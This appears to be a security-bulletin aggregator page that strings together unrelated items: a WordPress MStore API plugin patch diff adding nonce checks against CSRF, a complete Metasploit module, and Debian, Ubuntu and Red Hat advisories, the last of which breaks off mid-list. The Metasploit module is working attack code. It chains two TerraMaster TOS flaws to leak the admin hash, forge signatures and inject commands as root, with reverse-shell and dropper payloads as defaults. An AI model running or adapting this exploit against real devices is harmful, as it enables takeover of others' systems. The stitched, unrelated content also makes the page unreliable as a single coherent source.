The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_title function. This makes it possible for unauthenticated attackers to update new order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**mstore-api/trunk/assets/js/mstore-inspireui.js**

r2610824

r2925048

 

22

22

    $(document).on('blur', '.mstore-update-limit-product', function () {

23

23

        var limit = $(this).val();

 

24

        var nonce = $(this).data('nonce');

24

25

        $.ajax({

25

26

            type: 'post',

…

…

 

27

28

            data: {

28

29

                action: 'mstore\_update\_limit\_product',

29

 

                limit: limit

 

30

                limit: limit,

 

31

                nonce: nonce

30

32

            },

31

33

            success: function (result) {

…

…

 

39

41

    $(document).on('blur', '.mstore-update-firebase-server-key', function () {

40

42

        var serverKey = $(this).val();

 

43

        var nonce = $(this).data('nonce');

41

44

        $.ajax({

42

45

            type: 'post',

…

…

 

44

47

            data: {

45

48

                action: 'mstore\_update\_firebase\_server\_key',

46

 

                serverKey: serverKey

 

49

                serverKey: serverKey,

 

50

                nonce: nonce

47

51

            },

48

52

            success: function (result) {

…

…

 

56

60

    $(document).on('blur', '.mstore-update-new-order-title', function () {

57

61

        var title = $(this).val();

 

62

        var nonce = $(this).data('nonce');

58

63

        $.ajax({

59

64

            type: 'post',

…

…

 

61

66

            data: {

62

67

                action: 'mstore\_update\_new\_order\_title',

63

 

                title: title

 

68

                title: title,

 

69

                nonce: nonce

64

70

            },

65

71

            success: function (result) {

…

…

 

73

79

    $(document).on('blur', '.mstore-update-new-order-message', function () {

74

80

        var message = $(this).val();

 

81

        var nonce = $(this).data('nonce');

75

82

        $.ajax({

76

83

            type: 'post',

…

…

 

78

85

            data: {

79

86

                action: 'mstore\_update\_new\_order\_message',

80

 

                message: message

 

87

                message: message,

 

88

                nonce: nonce

81

89

            },

82

90

            success: function (result) {

…

…

 

90

98

    $(document).on('blur', '.mstore-update-status-order-title', function () {

91

99

        var title = $(this).val();

 

100

        var nonce = $(this).data('nonce');

92

101

        $.ajax({

93

102

            type: 'post',

…

…

 

95

104

            data: {

96

105

                action: 'mstore\_update\_status\_order\_title',

97

 

                title: title

 

106

                title: title,

 

107

                nonce: nonce

98

108

            },

99

109

            success: function (result) {

…

…

 

107

117

    $(document).on('blur', '.mstore-update-status-order-message', function () {

108

118

        var message = $(this).val();

 

119

        var nonce = $(this).data('nonce');

109

120

        $.ajax({

110

121

            type: 'post',

…

…

 

112

123

            data: {

113

124

                action: 'mstore\_update\_status\_order\_message',

114

 

                message: message

 

125

                message: message,

 

126

                nonce: nonce

115

127

            },

116

128

            success: function (result) {

**mstore-api/trunk/controllers/flutter-booking.php**

r2924554

r2925048

 

188

188

        global $wpdb;

189

189

        $table\_name = $wpdb->prefix . "wc\_appointment\_relationships";

190

 

        $items = $wpdb->get\_results("SELECT \* FROM $table\_name WHERE product\_id = '$product\_id'");

 

190

        $sql = $wpdb->prepare("SELECT \* FROM $table\_name WHERE product\_id = '$product\_id'");

 

191

        $items = $wpdb->get\_results($sql);

191

192

        foreach ($items as $item) {

192

193

            $user = get\_user\_by("ID", $item->staff\_id);

**mstore-api/trunk/controllers/flutter-wholesale.php**

r2924554

r2925048

 

75

75

        $role = $params\["role"\];

76

76

       

77

 

        if (isset($role) && in\_array($role, \['administrator','owner'\], true)) {

 

77

        if (!class\_exists('WooCommerceWholeSalePrices')) {

 

78

            return parent::sendError("invalid\_plugin", "You need to install WooCommerce Wholesale Prices plugin to use this api", 404);

 

79

        }

 

80

        global $wc\_wholesale\_prices;

 

81

        $data =  $wc\_wholesale\_prices->wwp\_wholesale\_roles->getAllRegisteredWholesaleRoles();

 

82

        $roles = \[\];

 

83

        $roles = array\_keys($data);

 

84

        $roles\[\] = 'subscriber';

 

85

        if (!isset($role) || !in\_array($role,$roles, true)) {

78

86

            return parent::sendError("invalid\_role", "Role is invalid.", 400);

79

87

        }

**mstore-api/trunk/mstore-api.php**

r2924554

r2925048

 

4

4

 \* Plugin URI: https://github.com/inspireui/mstore-api

5

5

 \* Description: The MStore API Plugin which is used for the MStore and FluxStore Mobile App

6

 

 \* Version: 3.9.6

 

6

 \* Version: 3.9.7

7

7

 \* Author: InspireUI

8

8

 \* Author URI: https://inspireui.com

…

…

 

41

41

class MstoreCheckOut

42

42

{

43

 

    public $version = '3.9.6';

 

43

    public $version = '3.9.7';

44

44

45

45

    public function \_\_construct()

…

…

 

213

213

214

214

    function mstore\_delete\_json\_file(){

215

 

        if(current\_user\_can( 'edit\_posts' )){

 

215

        if(checkIsAdmin(get\_current\_user\_id())){

216

216

            $id = sanitize\_text\_field($\_REQUEST\['id'\]);

217

217

            $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

218

218

            FlutterUtils::delete\_config\_file($id, $nonce);

 

219

        }else{

 

220

            wp\_send\_json\_error('No Permission',401);

219

221

        }

220

222

    }

…

…

 

222

224

    function mstore\_update\_limit\_product()

223

225

    {

224

 

        if(current\_user\_can( 'edit\_posts' )){

 

226

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

227

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_limit\_product')){

225

228

            $limit = sanitize\_text\_field($\_REQUEST\['limit'\]);

226

229

            if (is\_numeric($limit)) {

227

230

                update\_option("mstore\_limit\_product", intval($limit));

228

231

            }

 

232

        }else{

 

233

            wp\_send\_json\_error('No Permission',401);

229

234

        }

230

235

    }

…

…

 

232

237

    function mstore\_update\_firebase\_server\_key()

233

238

    {

234

 

        if(current\_user\_can( 'edit\_posts' )){

 

239

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

240

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_firebase\_server\_key')){

235

241

            $serverKey = sanitize\_text\_field($\_REQUEST\['serverKey'\]);

236

242

            update\_option("mstore\_firebase\_server\_key", $serverKey);

 

243

        }else{

 

244

            wp\_send\_json\_error('No Permission',401);

237

245

        }

238

246

    }

…

…

 

240

248

    function mstore\_update\_new\_order\_title()

241

249

    {

242

 

        if(current\_user\_can( 'edit\_posts' )){

 

250

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

251

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_new\_order\_title')){

243

252

            $title = sanitize\_text\_field($\_REQUEST\['title'\]);

244

253

            update\_option("mstore\_new\_order\_title", $title);

 

254

        }else{

 

255

            wp\_send\_json\_error('No Permission',401);

245

256

        }

246

257

    }

…

…

 

248

259

    function mstore\_update\_new\_order\_message()

249

260

    {

250

 

        if(current\_user\_can( 'edit\_posts' )){

 

261

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

262

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_new\_order\_message')){

251

263

            $message = sanitize\_text\_field($\_REQUEST\['message'\]);

252

264

            update\_option("mstore\_new\_order\_message", $message);

 

265

        }else{

 

266

            wp\_send\_json\_error('No Permission',401);

253

267

        }

254

268

    }

…

…

 

256

270

    function mstore\_update\_status\_order\_title()

257

271

    {

258

 

        if(current\_user\_can( 'edit\_posts' )){

 

272

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

273

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_status\_order\_title')){

259

274

            $title = sanitize\_text\_field($\_REQUEST\['title'\]);

260

275

            update\_option("mstore\_status\_order\_title", $title);

 

276

        }else{

 

277

            wp\_send\_json\_error('No Permission',401);

261

278

        }

262

279

    }

…

…

 

264

281

    function mstore\_update\_status\_order\_message()

265

282

    {

266

 

        if(current\_user\_can( 'edit\_posts' )){

 

283

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

284

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_status\_order\_message')){

267

285

            $message = sanitize\_text\_field($\_REQUEST\['message'\]);

268

286

            update\_option("mstore\_status\_order\_message", $message);

 

287

        }else{

 

288

            wp\_send\_json\_error('No Permission',401);

269

289

        }

270

290

    }

**mstore-api/trunk/readme.txt**

r2924554

r2925048

 

4

4

Requires at least: 4.4

5

5

Tested up to:      6.0.0

6

 

Stable tag:        3.9.6

 

6

Stable tag:        3.9.7

7

7

License:           GPL-2.0

8

8

License URI:       https://www.gnu.org/licenses/gpl-2.0.html

…

…

 

44

44

45

45

\== Changelog ==

 

46

\= 3.9.7 =

 

47

  \* Fix security issues

 

48

46

49

\= 3.9.6 =

47

50

  \* Fix security issues

**mstore-api/trunk/templates/admin/mstore-api-admin-dashboard.php**

r2924554

r2925048

 

74

74

        ?>

75

75

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

76

 

            <input type="number" value="<?php echo (!isset($limit) || $limit == false) ? 10 : esc\_attr($limit) ?>"

 

76

            <input type="number" data-nonce="<?php echo wp\_create\_nonce('update\_limit\_product'); ?>" value="<?php echo (!isset($limit) || $limit == false) ? 10 : esc\_attr($limit) ?>"

77

77

                   class="mstore-update-limit-product">

78

78

        </div>

…

…

 

88

88

        ?>

89

89

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

90

 

            <textarea class="mstore-update-firebase-server-key mstore\_input"

 

90

            <textarea data-nonce="<?php echo wp\_create\_nonce('update\_firebase\_server\_key'); ?>" class="mstore-update-firebase-server-key mstore\_input"

91

91

                      style="height: 120px"><?php echo esc\_attr($serverKey) ?></textarea>

92

92

        </div>

…

…

 

108

108

        ?>

109

109

        <div class="form-group" style="margin-top:10px;">

110

 

            <input type="text" placeholder="Title" value="<?php echo esc\_attr($newOrderTitle); ?>"

 

110

            <input type="text" placeholder="Title" data-nonce="<?php echo wp\_create\_nonce('update\_new\_order\_title'); ?>" value="<?php echo esc\_attr($newOrderTitle); ?>"

111

111

                   class="mstore-update-new-order-title mstore\_input">

112

112

        </div>

113

113

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

114

 

            <textarea placeholder="Message" class="mstore-update-new-order-message mstore\_input"

 

114

            <textarea placeholder="Message" data-nonce="<?php echo wp\_create\_nonce('update\_new\_order\_message'); ?>" class="mstore-update-new-order-message mstore\_input"

115

115

                      style="height: 120px"><?php echo esc\_attr($newOrderMsg); ?></textarea>

116

116

        </div>

…

…

 

132

132

        ?>

133

133

        <div class="form-group" style="margin-top:10px;">

134

 

            <input type="text" placeholder="Title" value="<?php echo esc\_attr($statusOrderTitle); ?>"

 

134

            <input type="text" placeholder="Title" data-nonce="<?php echo wp\_create\_nonce('update\_status\_order\_title'); ?>" value="<?php echo esc\_attr($statusOrderTitle); ?>"

135

135

                   class="mstore-update-status-order-title mstore\_input">

136

136

        </div>

137

137

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

138

 

            <textarea placeholder="Message" class="mstore-update-status-order-message mstore\_input"

 

138

            <textarea placeholder="Message" data-nonce="<?php echo wp\_create\_nonce('update\_status\_order\_message'); ?>" class="mstore-update-status-order-message mstore\_input"

139

139

                      style="height: 120px"><?php echo esc\_attr($statusOrderMsg); ?></textarea>

140

140

        </div>

CVE-2023-3201: Changeset 2925048 for mstore-api – WordPress Plugin Repository

This Metasploit module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS versions 4.2.29 and below by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information" and CVE-2022-24989, "Authenticated remote code execution". Exploiting vulnerable endpoint api.php?mobile/webNasIPS leaking sensitive information such as admin password hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint api.php?mobile/createRaid with POST parameters raidtype and diskstring to execute remote code as root on TerraMaster NAS devices.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'digest/md5'require 'time'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29          and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"          and CVE-2022-24989, "Authenticated remote code execution".          Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password          hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint          `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root          on TerraMaster NAS devices.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Octagon Networks', # Discovery          '0xf4n9x' # POC        ],        'References' => [          ['CVE', '2022-24990'],          ['CVE', '2022-24989'],          ['URL', 'https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/'],          ['URL', 'https://github.com/0xf4n9x/CVE-2022-24990'],          ['URL', 'https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990']        ],        'DisclosureDate' => '2022-03-07',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8181,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])    ])  end  def get_data    # Initialise variable data to store the leaked data    @data = {}    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`    # CVE-2022-24990    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),      'headers' => {        'User-Agent' => 'TNAS'      }    })    if res && res.code == 200 && res.body.include?('webNasIPS successful')      # Parse the JSON response and get the data such as admin password hash and MAC address      res_json = res.get_json_document      unless res_json.blank?        @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip        @data['key'] = @data['mac'][6..11] # last three MAC address entries        @data['timestamp'] = Time.new.to_i.to_s        # derive signature        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])      end    end  end  def tos_encrypt_str(key, str_to_encrypt)    id = key + str_to_encrypt    return Digest::MD5.hexdigest(id.encode('utf-8'))  end  def execute_command(cmd, _opts = {})    # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`    # CVE-2022-24989    diskstring = Rex::Text.rand_text_alpha_upper(4..8)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),      'ctype' => 'application/x-www-form-urlencoded',      'headers' => {        'User-Agent' => 'TNAS',        'Authorization' => @data['password'],        'Signature' => @data['signature'],        'Timestamp' => @data['timestamp']      },      'vars_post' => {        'raidtype' => ';' + cmd,        'diskstring' => diskstring.to_s      }    })  end  def get_terramaster_info    # get Terramaster CPU architecture (X64 or ARM64) and TOS version    @terramaster = {}    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')    })    if res && res.body && res.code == 200      # get the version information from the request response like below:      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>      return if res.body.match(/ver=.+?"/).nil?      version = res.body.match(/ver=.+?"/)[0]      # check if architecture is ARM64 or X64      if version.match(/_A/)        @terramaster['cpu_arch'] = 'ARM64'      elsif version.match(/_S/) || version.match(/_Q/)        @terramaster['cpu_arch'] = 'X64'      else        @terramaster['cpu_arch'] = 'UNKNOWN'      end      # strip TOS version number and remove trailing double quote.      @terramaster['tos_version'] = version.split('.0_')[1].chop    end  end  def check    get_terramaster_info    return CheckCode::Safe if @terramaster.empty?    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.29')      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")    end    CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")  end  def exploit    get_data    fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager(linemax: 65536)    end  endend

TerraMaster TOS 4.2.29 Remote Code Execution

Debian Linux Security Advisory 5425-1 - It was discovered that PHP's implementation of SOAP HTTP Digest authentication performed insufficient error validation, which may result in a stack information leak or use of weak randomness.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5425-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 13, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : not yet availableIt was discovered that PHP's implementation of SOAP HTTP Digestauthentication performed insufficient error validation, which may resultin a stack information leak or use of weak randomness.For the stable distribution (bookworm), this problem has been fixed inversion 8.2.7-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSIy9sACgkQEMKTtsN8TjbZKxAAkxlsoOX/Gqfw5W0hKEFjJ0CYIxk4ghwg1N+o4e9Ko7BoVIFnFeVB4dTes0DIbGpp8nBpsh5ynQ6iZePQyD3qI0BTS9TCEAuzVQTq9gcWW6m2I9YxSlWDv2uhHTuwFv/V0Qa+j57v1Rbp2boF/D/Mygi3A4ctFI5KveFejSPuPYSlZTijFjWMD0jL8ledgP3Gzu4p/c+tHwapkgBsFj2LmyHVAodnTm0YngYEd82j78Ez2qoyUVyNBfSfv0YcFBDEb+WTzZ6jCZTOTtMGtEknH3/G+DMr4P3/zzpp6iWYe/SlPI2tmeqY6/hGi8VBiKt1SSdlRKjkmLPR+FZy0GrDuuFU6xrrxLtlGpyaoXE5scF+yqbHgRJAIrPg+7THWQd9vYJDu5ZaBh/hsFvMRqsIGksGp9J5jqUjoEcpBuafrjrvYcKA2hyqvQLseUCZUXk/ZG9Osp0sZ2B29RQ3naTgE38kuyZ3V8ae+zlwdJRcewr5XVvPcTlDnLiIL/c9sH203fHe1iFwevNERrU9gdxYxqllsWL4CaOZW6M4Yfb5+Dd4ilmUkDr5US2wnuU57QbQHu9LSR1Sjav710gATpNL2JfyC+SlGgD96u6Zz4Cxo2alEpF/rW8jBg4gnbyWePRjTVuIadeopR67nwVhOJooz85oVN+NuN1WpGdJxYhhUNs=0RKf-----END PGP SIGNATURE-----

Debian Security Advisory 5425-1

Debian Linux Security Advisory 5424-1 - It was discovered that PHP's implementation of SOAP HTTP Digest authentication performed insufficient error validation, which may result in a stack information leak or use of weak randomness.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5424-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 13, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : not yet availableIt was discovered that PHP's implementation of SOAP HTTP Digestauthentication performed insufficient error validation, which may resultin a stack information leak or use of weak randomness.For the oldstable distribution (bullseye), this problem has been fixedin version 7.4.33-1+deb11u4.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSIyvIACgkQEMKTtsN8TjYdURAAmtKmyN+UIZIfOHkrg4DxpNL2dwSBcUefcozb5CYvo8R0RQJt62Ce+aI+nP6UXn0GCTzepfzJPGHS93t4BPNvxIQmp8jlofkRX1/Lnrg3ndPPtop+eQhmwdOq65app3kj/sa7b6sZKbsgbvayHu5eo1pRO0DCFIdHamDVcW1RFzJSCNOpsk6L9LjFqvOss5I8WXzL3z2TVGb20rv5LG78/nfPNgLIr63faG7XA2hQgCkT1iIlY8qT1IOTyKHxMWEnDFxZnnHWOFV3DF8iPF8EjmBKDAaEWWwOeIkk5Kiu4Jj8RayC0Gs6KPA0OI0NJ1ejdvGDa1SbJOqvtX5QHzc+jqqrpKlmtc2zHLezH9YZW802jkMOvxI65zepbYRXMsIqmDi624v5eJQh6qytl9YeLAsoJZfHw6Ic4RmpYfE/bsibX+y98TnKbDeUbkAOtG7m6kDobYQ8FXiY/dGK0jWLkcMCbU9lP4onL7s3SshJJEKgeyE17av2LUSJrPszxcD6wKbUj8hchn0t6AKtAKPMk8YHPS5mnUVd2jkNzgAmu7PrWgtoK94dfby1SB62HN129+6GMO67VQhEHQjgsbubnYRYq92+qKpZ0bvq7Oq54G9XYcRzsoGCXkBhQnoqei8PSSKchWEd887q4sFxUmZYgqSN9xtNJSzOX/lv07bYNHM=4iUa-----END PGP SIGNATURE-----

Debian Security Advisory 5424-1

Ubuntu Security Notice 6158-1 - It was discovered that Node Fetch incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to obtain sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6158-1June 13, 2023node-fetch vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Node Fetch could be made to expose sensitive information if it opened aspecially crafted file.Software Description:- node-fetch: A light-weight module that brings the Fetch API to Node.jsDetails:It was discovered that Node Fetch incorrectly handled certain inputs. If auser or an automated system were tricked into opening a specially craftedinput file, a remote attacker could possibly use this issue to obtainsensitive information.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   node-fetch                      1.7.3-2ubuntu0.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):   node-fetch                      1.7.3-1ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6158-1   CVE-2022-0235Package Information:   https://launchpad.net/ubuntu/+source/node-fetch/1.7.3-2ubuntu0.1

Ubuntu Security Notice USN-6158-1

Red Hat Security Advisory 2023-3495-01 - Logging Subsystem 5.7.2 - Red Hat OpenShift. Issues addressed include cross site scripting and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.7.2 - Red Hat OpenShift security update  
Advisory ID:       RHSA-2023:3495-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3495  
Issue date:        2023-06-12  
CVE Names:         CVE-2021-26341 CVE-2021-33655 CVE-2021-33656  
                   CVE-2022-1462 CVE-2022-1679 CVE-2022-1789  
                   CVE-2022-2196 CVE-2022-2663 CVE-2022-3028  
                   CVE-2022-3239 CVE-2022-3522 CVE-2022-3524  
                   CVE-2022-3564 CVE-2022-3566 CVE-2022-3567  
                   CVE-2022-3619 CVE-2022-3623 CVE-2022-3625  
                   CVE-2022-3627 CVE-2022-3628 CVE-2022-3707  
                   CVE-2022-3970 CVE-2022-4129 CVE-2022-20141  
                   CVE-2022-25147 CVE-2022-25265 CVE-2022-30594  
                   CVE-2022-36227 CVE-2022-39188 CVE-2022-39189  
                   CVE-2022-41218 CVE-2022-41674 CVE-2022-41723  
                   CVE-2022-42703 CVE-2022-42720 CVE-2022-42721  
                   CVE-2022-42722 CVE-2022-43750 CVE-2022-47929  
                   CVE-2023-0394 CVE-2023-0461 CVE-2023-1195  
                   CVE-2023-1582 CVE-2023-2491 CVE-2023-22490  
                   CVE-2023-23454 CVE-2023-23946 CVE-2023-25652  
                   CVE-2023-25815 CVE-2023-27535 CVE-2023-27539  
                   CVE-2023-28120 CVE-2023-29007  
====================================================================  
1. Summary:

Logging Subsystem 5.7.2 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.7.2 - Red Hat OpenShift

Security Fix(es):

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

* rubygem-rack: denial of service in header parsing (CVE-2023-27539)

* rubygem-activesupport: Possible XSS in SafeBuffer#bytesplice  
(CVE-2023-28120)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2179637 - CVE-2023-28120 rubygem-activesupport: Possible XSS in SafeBuffer#bytesplice  
2179649 - CVE-2023-27539 rubygem-rack: denial of service in header parsing

5. JIRA issues fixed (https://issues.redhat.com/):

LOG-3314 - [fluentd] The passphrase can not be enabled when forwarding logs to Kafka  
LOG-3316 - openshift-logging namespace can not be deleted directly when use lokistack as default store.  
LOG-3330 - run.sh shows incorrect chunk_limit_size if changed.  
LOG-3445 - [vector to loki]  validation is not disabled  when tls.insecureSkipVerify=true  
LOG-3749 - Unability to configure nodePlacement and toleration for logging-view-plugin  
LOG-3784 - [fluentd http] the defaut value HTTP content type application/x-ndjson is unsupported on datadog  
LOG-3827 - [fluentd http] The passphase isn't generated in fluent.conf  
LOG-3878 - [vector] PHP multiline errors are collected line by line when detectMultilineErrors is enabled.  
LOG-3945 - [Vector] Collector pods in CrashLoopBackOff when ClusterLogForwarder pipeline has space in between the pipeline name.  
LOG-3997 - Add http to log_forwarder_output_info metrics  
LOG-4011 - [Vector] Collector not complying with the custom tlsSecurityProfile configuration.  
LOG-4019 - [release-5.7] fluentd multiline exception plugin fails to detect JS client exception  
LOG-4049 - [release-5.7] User can list labels and label values for all user workload namespaces via Loki Label APIs  
LOG-4052 - [release-5.7] Fix Loki timeouts querying logs from OCP Console  
LOG-4098 - [release-5.7] No log_forwarder_output_info for splunk and google logging  
LOG-4151 - Fluentd fix  missing nil check for rotated_tw in update_watcher  
LOG-4163 - [release-5.7] TLS configuration for multiple Kafka brokers is not created in Vector  
LOG-4185 - Resources, tolerations and nodeSelector for the collector are missing  
LOG-4218 - Vector fails to run when configuring syslog forwarding for audit log  
LOG-4219 - Vector handles journal log as container log when enabling syslog forwarding. It breaks the compatibility with Fluentd  
LOG-4220 - [RHOCP4.11] Logs of POD which doesn't have labels specified by structuredTypeKey are parsed to JSON, and forwarded to app-xxxxxx  
LOG-4221 - [release-5.7] Fluentd wrongly closes a log file due to hash collision

6. References:

https://access.redhat.com/security/cve/CVE-2021-26341  
https://access.redhat.com/security/cve/CVE-2021-33655  
https://access.redhat.com/security/cve/CVE-2021-33656  
https://access.redhat.com/security/cve/CVE-2022-1462  
https://access.redhat.com/security/cve/CVE-2022-1679  
https://access.redhat.com/security/cve/CVE-2022-1789  
https://access.redhat.com/security/cve/CVE-2022-2196  
https://access.redhat.com/security/cve/CVE-2022-2663  
https://access.redhat.com/security/cve/CVE-2022-3028  
https://access.redhat.com/security/cve/CVE-2022-3239  
https://access.redhat.com/security/cve/CVE-2022-3522  
https://access.redhat.com/security/cve/CVE-2022-3524  
https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-3566  
https://access.redhat.com/security/cve/CVE-2022-3567  
https://access.redhat.com/security/cve/CVE-2022-3619  
https://access.redhat.com/security/cve/CVE-2022-3623  
https://access.redhat.com/security/cve/CVE-2022-3625  
https://access.redhat.com/security/cve/CVE-2022-3627  
https://access.redhat.com/security/cve/CVE-2022-3628  
https://access.redhat.com/security/cve/CVE-2022-3707  
https://access.redhat.com/security/cve/CVE-2022-3970  
https://access.redhat.com/security/cve/CVE-2022-4129  
https://access.redhat.com/security/cve/CVE-2022-20141  
https://access.redhat.com/security/cve/CVE-2022-25147  
https://access.redhat.com/security/cve/CVE-2022-25265  
https://access.redhat.com/security/cve/CVE-2022-30594  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2022-39189  
https://access.redhat.com/security/cve/CVE-2022-41218  
